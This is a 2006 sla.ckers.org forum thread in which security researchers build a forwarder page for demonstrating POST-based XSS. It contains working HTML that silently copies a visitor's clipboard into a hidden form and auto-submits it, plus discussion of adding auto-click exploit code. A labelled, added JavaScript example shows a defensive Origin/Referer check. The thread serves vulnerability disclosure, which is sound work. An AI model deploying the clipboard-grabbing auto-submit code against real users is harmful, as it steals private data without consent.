sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existence you have. No death threats or poetry please. Just kidding, no poetry please.
Disclosing POSTs
Posted by: maluc
Date: September 06, 2006 01:49AM

for the full disclosure section in particular, although useful everywhere.. a way to link to XSS that requires POST would be handy.

basically just a form builder, and yes i know it's a bit of a pain to implement - and to prevent XSS of sla.ckers from :/

-maluc

Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 04:49AM

Well... it took me a while but how about this:
http://www.whiteacid.org/misc/xss_post_forwarder.php
code is at: http://www.whiteacid.org/misc/xss_post_forwarder.phps

It can't handle radio buttons, and as you can see from the classes I'd made the classes support any input type but I hadn't bothered creating the way for users to supply what they want the user type to be. Still... is that what you meant?

Edit: yes, I realise that the referer on the target server will be mine, I don't really care.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/06/2006 05:00AM by WhiteAcid.

Re: Disclosing POSTs
Posted by: rsnake
Date: September 06, 2006 10:29AM

Very cool WhiteAcid... That's a much easier implementation than I was originally thinking of building.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 10:36AM

Out of curiosity, what was your approach?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Disclosing POSTs
Posted by: rsnake
Date: September 06, 2006 01:51PM

I was going to do some annoying dynamic JavaScript form builder. It was going to suck.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 05:20PM

I've edited the script a bit. Should make more sense. After I actually used it to show a real XSS I found usability bugs. It now expects the target url in the xss_target variable, allows empty fields and is less cluttered.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Disclosing POSTs
Posted by: kirke
Date: September 21, 2006 09:08AM

hmm, what's the advantage of this tool against Mozilla WebDeveloper extension?

Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 21, 2006 09:21AM

Any browser can use this and it's easier to share the finds. Some of us (me included) don't use that extension either.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Disclosing POSTs
Posted by: rsnake
Date: September 21, 2006 10:20AM

I find it very useful, keep it up. But if I could make one suggestion it would be to include a textarea with the exploit code in it (including the automatic click event) so people don't have to code that part for themselves. Here's the HTML from http://ha.ckers.org/cutandpaste.html as an example:

<body onload="cutandpaste();">
<form method=post name=f action="cutandpaste.cgi">
<input type="submit" class="button" name="s" style="width=1px;height=1px">
<textarea maxlength=10000 name=clipb style="width=1px;height=1px"></textarea>
</form>
This only works in Internet Explorer. If you are using Firefox, or if you don't have anything in your clipboard this will be a pretty boring demo.
<script>
function cutandpaste() {
document.f.clipb.createTextRange().execCommand("Paste");
document.f.s.click();
}
</script>
</body>

The "document.f.s.click();" part is the part that's particularly interesting here.

- RSnake
Gotta love it. http://ha.ckers.org
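
A target-side check for two points in the thread (WhiteAcid's note that the forwarded POST arrives with the forwarder's Referer, and the auto-submitted form above), as an added example that is not part of the thread or of the forwarder script. It rejects state-changing requests whose Origin or Referer is not allow-listed; `ALLOWED_ORIGINS`, the host names and the sample requests are constructed for illustration.

```javascript
// Added example (not from the thread): decide whether a state-changing
// request came from one of the site's own pages.
// ALLOWED_ORIGINS and every host name below are assumptions for illustration.
const ALLOWED_ORIGINS = new Set(["https://app.example"]);

// Return scheme://host[:port] of a header value, or null if absent or unparseable.
function originOf(value) {
  if (!value || value === "null") return null;
  try {
    return new URL(value).origin;
  } catch (e) {
    return null;
  }
}

// headers: object with lower-cased header names, as Node's http module provides.
function checkPost(method, headers) {
  if (!["POST", "PUT", "DELETE", "PATCH"].includes(method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  // If Origin is present (even as "null") it is authoritative; Referer is
  // only a fallback for clients that send no Origin header at all.
  const raw = headers["origin"] !== undefined ? headers["origin"] : headers["referer"];
  const source = originOf(raw);
  if (source === null) {
    // Nothing usable: fail closed rather than guess.
    return { allow: false, reason: "no source origin" };
  }
  if (!ALLOWED_ORIGINS.has(source)) {
    return { allow: false, reason: "cross-site source " + source };
  }
  return { allow: true, reason: "same-site source" };
}

// Constructed sample requests.
const samples = [
  ["own form", { origin: "https://app.example" }],
  ["forwarded", { referer: "http://forwarder.example/xss_post_forwarder.php?xss_target=x" }],
  ["sandboxed", { origin: "null", referer: "https://app.example/form" }],
  ["lookalike", { referer: "https://app.example.other.example/page" }],
  ["no headers", {}],
];
for (const [name, headers] of samples) {
  console.log(name, JSON.stringify(checkPost("POST", headers)));
}
```

This only limits cross-site delivery of the POST; the reflected parameter still needs output encoding at the target.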

Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 21, 2006 11:42AM

Good suggestion. While it could be seen as encouraging exploitation as opposed to showing PoCs, anyone who did want to exploit a flaw shown in the script will already know how to do it anyway, so there's no extra harm in adding the textarea.
I've done it anyway. Also I've extended the width of the input fields, which was really bugging me.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
